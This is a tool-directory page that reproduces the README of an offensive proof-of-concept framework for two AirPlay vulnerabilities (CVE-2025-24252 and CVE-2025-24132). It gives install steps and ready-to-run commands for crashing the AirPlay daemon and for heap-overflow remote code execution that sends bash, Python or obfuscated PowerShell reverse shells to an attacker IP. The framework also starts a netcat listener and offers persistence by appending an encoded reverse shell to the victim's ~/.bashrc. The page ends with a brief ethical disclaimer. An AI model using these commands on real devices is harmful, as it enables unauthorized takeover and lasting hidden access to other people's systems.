Skip to content
KitploitKITPLOIT
ToolsBlog
Submit
ToolsBlog
Submit

Hacking, PenTest, and Cybersecurity Tools for Your Security Arsenal!

Kitploit is a directory of hacking, cybersecurity, and pentesting tools. Discover the latest project updates to find vulnerabilities, analyze systems, automate testing, and strengthen your security.

··Feeds·Contact·Privacy·© 2026 Kitploit

Tool Directory

Categories

View all categories
Loading categories
AirBorne-PoC — poc for CVE-2025-24252 & CVE-2025-24132 | Kitploit
Tools/GitHubGitHub/ekomssavior/airborne-poc
Persistence MechanismsVulnerability AnalysisExploitationShellcodePost-ExploitationCommand and ControlRemote Access ToolPayload DevelopmentBinary Exploitation
GitHubekomssavior/airborne-poc

AirBorne-PoC

poc for CVE-2025-24252 & CVE-2025-24132

16427438 months agoReviewed by Kitploit

Most Popular

View all →

Discover the most used tools by our community.

Explore all tools

Browse our collection of tools

View all tools →
View Repository
Share

AirBorne PoC Framework – Elite RCE Edition

Full PoC Framework for CVE-2025-24252 & CVE-2025-24132
By ekomsSavior |

AirBorne is a combined proof-of-concept (PoC) framework targeting two serious vulnerabilities in Apple's AirPlay service. It includes a full crash trigger and a working reverse shell exploit with optional persistence, listener, and multiple payload formats — all in one script.

Looking for the original version?
The legacy edition is still available in the legacy branch of this repository.
To check it out:

root@kitploit:~
git checkout legacy

CVEs Covered

CVE-2025-24252 – mDNS TXT Record Crash

  • Triggers a crash in the AirPlayReceiver daemon via a malformed mDNS packet
  • Works over UDP broadcast on port 5353

CVE-2025-24132 – Heap Overflow → Reverse Shell (RCE)

  • Triggers a heap overflow in AirPlay's TCP service on port 7000
  • Supports bash, python, and PowerShell reverse shell payloads
  • Includes optional persistence using .bashrc injection (Linux)
Download Tool

Getting Started

1. Clone the Repo

root@kitploit:~
git clone https://github.com/ekomsSavior/AirBorne-PoC.git
cd AirBorne-PoC

2. Install Dependencies

root@kitploit:~
sudo apt update
sudo apt install -y python3-scapy netcat

Runtime Walkthrough

The single script airborne.py includes both PoCs and all logic:

  • Select a CVE using --exploit
  • Set a reverse shell payload using --payload
  • Auto-starts a netcat listener for you
  • Optionally enables persistence on target using --persistent

Usage Examples

Crash Target with mDNS Packet (CVE-2025-24252)

root@kitploit:~
sudo python3 airborne.py --exploit 24252 --interface wlan0

Requires an interface in monitor mode.


Launch Heap Overflow → RCE (CVE-2025-24132)

Start full exploit with default bash shell:

root@kitploit:~
sudo python3 airborne.py --exploit 24132 --target 192.168.1.42 --attacker 192.168.1.99

Choose Python shell instead:

root@kitploit:~
sudo python3 airborne.py --exploit 24132 --target 192.168.1.42 --attacker 192.168.1.99 --payload python

Enable real persistence on Linux targets:

root@kitploit:~
sudo python3 airborne.py --exploit 24132 --target 192.168.1.42 --attacker 192.168.1.99 --persistent

Only shell command einjection

root@kitploit:~
sudo python3 airborne_bash_command_injector.py --exploit 24132 --target 192.168.1.42 --command "command"

Payload Options

PayloadDescription
bashDefault bash reverse shell over TCP
pythonPython-based reverse shell using socket and pty
powershellFull Windows PowerShell RCE payload (obfuscated)

Persistence Mode

When using --persistent, the script will append the encoded reverse shell payload to the target’s:

root@kitploit:~
~/.bashrc

This ensures a shell is returned to you each time the user logs in or a terminal is spawned.


Maintenance Notes

  • Reverse shells are encoded using base64 and delivered after buffer overflow
  • All payloads are sent via port 7000
  • mDNS packets go over UDP 5353 and require raw socket permission
  • Make sure your attack box IP is reachable by the target device
  • Script handles basic error cases and fails silently if closed ports

Ethical Disclaimer

This project is intended for educational, ethical, and authorized research only.

  • You must have explicit permission to test the target system.
  • You assume full responsibility for any actions taken.

Unauthorized exploitation of systems is illegal and unethical.


Credits

  • Built by ekomsSavior
  • Inspired by real-world CVEs and exploit development research